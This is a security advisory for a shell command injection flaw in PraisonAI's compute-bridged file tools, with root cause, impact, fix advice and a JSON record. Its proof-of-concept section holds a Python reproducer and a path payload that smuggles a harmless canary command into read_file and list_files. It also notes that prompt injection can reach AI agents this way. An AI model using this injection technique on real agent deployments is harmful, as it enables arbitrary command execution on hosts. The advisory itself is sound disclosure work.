GHSA-W6H2-FR4Q-XVXV

Vulnerability from github – Published: 2026-06-18 13:55 – Updated: 2026-06-18 13:55
VLAI
Summary
PraisonAI: Compute-bridged file tools allow shell command injection
Details

Compute-bridged file tools allow shell command injection

Summary

LocalManagedAgent / SandboxedAgent compute bridging wraps read_file, list_files, and write_file when a compute provider is attached. The bridge converts those file operations into shell command strings using raw path arguments, then sends those strings to shell-backed compute providers.

An attacker who can influence a file-tool path argument can break out of the quoted path and execute arbitrary shell commands in the compute environment. With compute="local", commands execute through the local subprocess compute provider on the host. With Docker, commands execute in the container.

Affected Product

  • Repository: MervinPraison/PraisonAI
  • Package: praisonai
  • Component: src/praisonai/praisonai/integrations/managed_local.py
  • Confirmed affected:
  • v4.6.10
  • v4.6.56
  • v4.6.57
  • current main at 2f9677abb2ea68eab864ee8b6a828fd0141612e1
  • Confirmed not affected:
  • v4.6.9
  • v4.6.1
  • v4.5.149
  • Suggested affected range: >= 4.6.10, <= 4.6.57

Root Cause

Current managed_local.py defines the bridged tool set:

compute_bridged_tools = {"execute_command", "read_file", "write_file", "list_files"}

For file tools, _bridge_file_tool() constructs shell command strings:

command = f'cat "{filepath}"'
command = f'ls -la "{directory}"'
command = f'cat > "{filepath}" << "EOF"\n{content}\nEOF'

The local compute provider executes the string with asyncio.create_subprocess_shell(...); the Docker compute provider executes it with ["sh", "-c", command].

The bridge keeps the low-risk read_file / list_files tool names and signatures while changing their execution primitive into shell interpretation.

Why This Is Not Intended Behavior

Compute bridging itself is documented and intentional. The vulnerability is that file path data is interpreted as shell syntax.

The normal read_file and list_files implementations treat the same payload as a literal path and do not expand shell metacharacters. The approval registry also marks execute_command as critical, while read_file and list_files are not dangerous-tool entries.

Impact

An application that exposes a PraisonAI agent using LocalManagedAgent or SandboxedAgent with a compute provider and a restricted file-tool set can be tricked into executing shell commands through a path argument to read_file or list_files.

This can bypass least-privilege tool configuration and tool-approval expectations. A prompt-injection path, chat endpoint, automation webhook, or other user-controlled agent task can supply the file path argument without the operator granting execute_command.

Local PoV

The PoV is local-only and harmless. It uses an environment canary and compares normal file tools against compute-bridged file tools.

Minimal inline reproducer:

import os
from pathlib import Path

from praisonai.integrations.managed_local import LocalManagedAgent, LocalManagedConfig
from praisonaiagents.tools import list_files, read_file

workdir = Path(".prai-cand-006-pov-workdir")
workdir.mkdir(exist_ok=True)
(workdir / "safe.txt").write_text("SAFE_CONTENT\n", encoding="utf-8")

canary = "PRAISONAI_CAND_006_COMMAND_EXECUTED"
os.environ["PRAI_CAND_006_CANARY"] = canary
payload = 'missing"; printf "$PRAI_CAND_006_CANARY"; #'

# Control: normal file tools treat the payload as a literal path.
normal_read = read_file(str(workdir / payload))
normal_list = str(list_files(str(workdir) + '"; printf "$PRAI_CAND_006_CANARY"; #'))

cfg = LocalManagedConfig(
    name="prai-cand-006-poc",
    tools=["read_file", "list_files"],
    working_dir=str(workdir),
)
managed = LocalManagedAgent(config=cfg, compute="local")
tools = {tool.__name__: tool for tool in managed._resolve_tools()}

bridged_read = tools["read_file"](payload)
bridged_list = tools["list_files"]('."; printf "$PRAI_CAND_006_CANARY"; #')

print("normal_read_contains_canary", canary in normal_read)
print("normal_list_contains_canary", canary in normal_list)
print("bridged_read_contains_canary", canary in bridged_read)
print("bridged_list_contains_canary", canary in bridged_list)

Command:

python3 \
  submission-bundle/praisonai-prai-cand-006-compute-file-tool-command-injection/poc/prai_cand_006_compute_file_tool_command_injection.py \
  --repo artifacts/repos/praisonai-current

Current-head result:

{
  "describe": "v4.6.57-4-g2f9677ab",
  "vulnerable": true,
  "normal_controls": {
    "read_file_payload_contains_canary": false,
    "list_files_payload_contains_canary": false
  },
  "bridged_results": {
    "read_file_payload_contains_canary": true,
    "list_files_payload_contains_canary": true
  },
  "approval_registry": {
    "execute_command_risk": "critical",
    "read_file_risk": null,
    "list_files_risk": null
  }
}

The payload used by the PoV is:

missing"; printf "$PRAI_CAND_006_CANARY"; #

Normal read_file treats this as a literal missing filename. The bridged tool constructs:

cat "missing"; printf "$PRAI_CAND_006_CANARY"; #"

and returns the canary from the compute shell.

Suggested Fix

Do not implement file operations by constructing shell command strings from path/content arguments.

Preferred fix:

  1. Add provider-native file APIs for read, write, and list operations, or pass arguments as structured argv where the provider supports it.
  2. Preserve the normal file-tool path validation and workspace boundary checks for compute-bridged file tools.
  3. Treat write_file content as data, not shell source. The current heredoc construction is also unsafe if content can contain the delimiter.
  4. Add regression tests that use paths containing ", ;, $(), backticks, newline, and # and assert no shell execution occurs.
  5. Keep execute_command as the only bridge path that intentionally accepts a shell command string, with critical approval semantics.

A minimal stopgap is to remove read_file, list_files, and write_file from compute_bridged_tools until safe provider-native file operations exist.

Suggested Severity

The vector assumes an attacker has low-privilege access to an agent interface that can request file-tool use. If a deployment exposes such an agent without authentication, PR:N may be appropriate.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.6.58"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "praisonai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.6.10"
            },
            {
              "fixed": "4.6.59"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-78",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T13:55:08Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "# Compute-bridged file tools allow shell command injection\n\n## Summary\n\n`LocalManagedAgent` / `SandboxedAgent` compute bridging wraps\n`read_file`, `list_files`, and `write_file` when a compute provider is\nattached. The bridge converts those file operations into shell command strings\nusing raw path arguments, then sends those strings to shell-backed compute\nproviders.\n\nAn attacker who can influence a file-tool path argument can break out of the\nquoted path and execute arbitrary shell commands in the compute environment.\nWith `compute=\"local\"`, commands execute through the local subprocess compute\nprovider on the host. With Docker, commands execute in the container.\n\n## Affected Product\n\n- Repository: `MervinPraison/PraisonAI`\n- Package: `praisonai`\n- Component: `src/praisonai/praisonai/integrations/managed_local.py`\n- Confirmed affected:\n  - `v4.6.10`\n  - `v4.6.56`\n  - `v4.6.57`\n  - current `main` at `2f9677abb2ea68eab864ee8b6a828fd0141612e1`\n- Confirmed not affected:\n  - `v4.6.9`\n  - `v4.6.1`\n  - `v4.5.149`\n- Suggested affected range: `\u003e= 4.6.10, \u003c= 4.6.57`\n\n## Root Cause\n\nCurrent `managed_local.py` defines the bridged tool set:\n\n```python\ncompute_bridged_tools = {\"execute_command\", \"read_file\", \"write_file\", \"list_files\"}\n```\n\nFor file tools, `_bridge_file_tool()` constructs shell command strings:\n\n```python\ncommand = f\u0027cat \"{filepath}\"\u0027\ncommand = f\u0027ls -la \"{directory}\"\u0027\ncommand = f\u0027cat \u003e \"{filepath}\" \u003c\u003c \"EOF\"\\n{content}\\nEOF\u0027\n```\n\nThe local compute provider executes the string with\n`asyncio.create_subprocess_shell(...)`; the Docker compute provider executes it\nwith `[\"sh\", \"-c\", command]`.\n\nThe bridge keeps the low-risk `read_file` / `list_files` tool names and\nsignatures while changing their execution primitive into shell interpretation.\n\n## Why This Is Not Intended Behavior\n\nCompute bridging itself is documented and intentional. The vulnerability is\nthat file path data is interpreted as shell syntax.\n\nThe normal `read_file` and `list_files` implementations treat the same payload\nas a literal path and do not expand shell metacharacters. The approval registry\nalso marks `execute_command` as `critical`, while `read_file` and `list_files`\nare not dangerous-tool entries.\n\n## Impact\n\nAn application that exposes a PraisonAI agent using `LocalManagedAgent` or\n`SandboxedAgent` with a compute provider and a restricted file-tool set can be\ntricked into executing shell commands through a path argument to `read_file` or\n`list_files`.\n\nThis can bypass least-privilege tool configuration and tool-approval\nexpectations. A prompt-injection path, chat endpoint, automation webhook, or\nother user-controlled agent task can supply the file path argument without the\noperator granting `execute_command`.\n\n## Local PoV\n\nThe PoV is local-only and harmless. It uses an environment canary and compares\nnormal file tools against compute-bridged file tools.\n\nMinimal inline reproducer:\n\n```python\nimport os\nfrom pathlib import Path\n\nfrom praisonai.integrations.managed_local import LocalManagedAgent, LocalManagedConfig\nfrom praisonaiagents.tools import list_files, read_file\n\nworkdir = Path(\".prai-cand-006-pov-workdir\")\nworkdir.mkdir(exist_ok=True)\n(workdir / \"safe.txt\").write_text(\"SAFE_CONTENT\\n\", encoding=\"utf-8\")\n\ncanary = \"PRAISONAI_CAND_006_COMMAND_EXECUTED\"\nos.environ[\"PRAI_CAND_006_CANARY\"] = canary\npayload = \u0027missing\"; printf \"$PRAI_CAND_006_CANARY\"; #\u0027\n\n# Control: normal file tools treat the payload as a literal path.\nnormal_read = read_file(str(workdir / payload))\nnormal_list = str(list_files(str(workdir) + \u0027\"; printf \"$PRAI_CAND_006_CANARY\"; #\u0027))\n\ncfg = LocalManagedConfig(\n    name=\"prai-cand-006-poc\",\n    tools=[\"read_file\", \"list_files\"],\n    working_dir=str(workdir),\n)\nmanaged = LocalManagedAgent(config=cfg, compute=\"local\")\ntools = {tool.__name__: tool for tool in managed._resolve_tools()}\n\nbridged_read = tools[\"read_file\"](payload)\nbridged_list = tools[\"list_files\"](\u0027.\"; printf \"$PRAI_CAND_006_CANARY\"; #\u0027)\n\nprint(\"normal_read_contains_canary\", canary in normal_read)\nprint(\"normal_list_contains_canary\", canary in normal_list)\nprint(\"bridged_read_contains_canary\", canary in bridged_read)\nprint(\"bridged_list_contains_canary\", canary in bridged_list)\n```\n\nCommand:\n\n```bash\npython3 \\\n  submission-bundle/praisonai-prai-cand-006-compute-file-tool-command-injection/poc/prai_cand_006_compute_file_tool_command_injection.py \\\n  --repo artifacts/repos/praisonai-current\n```\n\nCurrent-head result:\n\n```json\n{\n  \"describe\": \"v4.6.57-4-g2f9677ab\",\n  \"vulnerable\": true,\n  \"normal_controls\": {\n    \"read_file_payload_contains_canary\": false,\n    \"list_files_payload_contains_canary\": false\n  },\n  \"bridged_results\": {\n    \"read_file_payload_contains_canary\": true,\n    \"list_files_payload_contains_canary\": true\n  },\n  \"approval_registry\": {\n    \"execute_command_risk\": \"critical\",\n    \"read_file_risk\": null,\n    \"list_files_risk\": null\n  }\n}\n```\n\nThe payload used by the PoV is:\n\n```text\nmissing\"; printf \"$PRAI_CAND_006_CANARY\"; #\n```\n\nNormal `read_file` treats this as a literal missing filename. The bridged tool\nconstructs:\n\n```sh\ncat \"missing\"; printf \"$PRAI_CAND_006_CANARY\"; #\"\n```\n\nand returns the canary from the compute shell.\n\n## Suggested Fix\n\nDo not implement file operations by constructing shell command strings from\npath/content arguments.\n\nPreferred fix:\n\n1. Add provider-native file APIs for read, write, and list operations, or pass\n   arguments as structured argv where the provider supports it.\n2. Preserve the normal file-tool path validation and workspace boundary checks\n   for compute-bridged file tools.\n3. Treat `write_file` content as data, not shell source. The current heredoc\n   construction is also unsafe if content can contain the delimiter.\n4. Add regression tests that use paths containing `\"`, `;`, `$()`, backticks,\n   newline, and `#` and assert no shell execution occurs.\n5. Keep `execute_command` as the only bridge path that intentionally accepts a\n   shell command string, with critical approval semantics.\n\nA minimal stopgap is to remove `read_file`, `list_files`, and `write_file` from\n`compute_bridged_tools` until safe provider-native file operations exist.\n\n## Suggested Severity\n\nThe vector assumes an attacker has low-privilege access to an agent interface\nthat can request file-tool use. If a deployment exposes such an agent without\nauthentication, `PR:N` may be appropriate.",
  "id": "GHSA-w6h2-fr4q-xvxv",
  "modified": "2026-06-18T13:55:08Z",
  "published": "2026-06-18T13:55:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-w6h2-fr4q-xvxv"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI: Compute-bridged file tools allow shell command injection"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…